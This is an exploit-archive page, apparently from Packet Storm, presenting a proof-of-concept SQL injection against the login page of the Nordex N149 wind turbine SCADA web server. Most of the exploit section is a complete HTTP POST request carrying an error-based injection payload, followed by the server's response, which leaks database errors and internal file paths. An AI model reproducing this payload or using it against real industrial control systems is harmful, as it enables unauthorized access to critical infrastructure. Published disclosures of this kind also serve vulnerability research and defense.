exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nordex N149/4.0-4.5 Scada Web Server SQL Injection

Nordex N149/4.0-4.5 Scada Web Server SQL Injection
Posted May 22, 2018
Authored by t4rkd3vilz

Nordex N149//4.0-4.5 Scada Web Server suffers from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
SHA-256 | 153660c67137f0974f8f7b6cc76b5d5553fa168b32b88dbbea557f6d0a9bcaec

Nordex N149/4.0-4.5 Scada Web Server SQL Injection

Change Mirror Download
 # Exploit Title: Nordex N149/4.0-4.5 Scada Web Server - SQL Injection
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.nordex-online.com
# Tested on: Windows
# Version: N149/4.0-4.5
# Category: webapps

---> Proof Of Concept

-------- > Request

POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress// <http://ipadress//>
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

login=-
*1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27*
&password=3

-------- > Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding

<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
'_!@4dilemma:1' for key 'group_key' in <b>/share/HDA_DATA/Web/php/login.php</b>
on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close